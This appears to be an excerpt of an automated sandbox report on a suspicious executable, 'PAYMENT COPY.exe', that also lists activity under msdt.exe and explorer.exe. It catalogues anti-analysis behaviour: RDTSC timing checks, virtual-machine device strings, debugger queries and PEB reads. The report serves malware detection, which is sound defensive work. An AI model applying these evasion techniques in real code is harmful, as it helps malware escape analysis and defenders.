Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000AD85F4 second address: 0000000000AD85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000AD898E second address: 0000000000AD8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_004088C0 rdtsc
Source: C:\Windows\explorer.exe TID: 6204 | Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_004026BC FindFirstFileA,
Source: explorer.exe, 00000004.00000000.360549025.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.361717785.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.366638301.000000000D462000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.362236089.0000000008540000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.352285972.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.360549025.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.352285972.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.360457599.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.360457599.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.361717785.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00409B30 LdrLoadDll,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_026417F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_026415D8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B190AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B92073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B061A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B569A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B02990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AFC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B641E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B02AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B02ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AE8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B1927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B64257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B9EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B02397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B9138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B8D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B9131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00ADF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AE849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B914FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00AF746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 2_2_00B0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
